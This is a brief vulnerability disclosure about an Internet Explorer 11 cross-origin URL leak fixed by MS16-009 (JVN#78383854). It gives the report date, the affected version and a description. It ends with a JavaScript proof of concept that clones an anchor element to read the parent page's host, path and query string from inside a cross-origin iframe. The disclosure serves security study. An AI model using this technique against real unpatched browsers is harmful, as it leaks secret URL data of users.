Cross origin URL information leakage of IE was fixed by MS16-009. (JVN#78383854: Internet Explorer cross-domain policy bypass)
- Reported
- 2015-09-18
- Confirmed version
- Internet Explorer 11.0.9600.18036
- Description
- A cross origin content in the iframe child can retrieve part of the url of parent page of iframe. Secret strings in the url may be leaked to the child page of iframe.
- PoC
var elm = document.createElement( "a" ); elm.href = "#"; elm = elm.cloneNode( false ); alert( elm.protocol ); // protocol scheme of parent page alert( elm.host ); // hostname with port number of parent page alert( elm.hostname ); // hostname of parent page alert( elm.port ); // port number of parent page alert( elm.pathname ); // path name of parent page alert( elm.search ); // query string of parent page
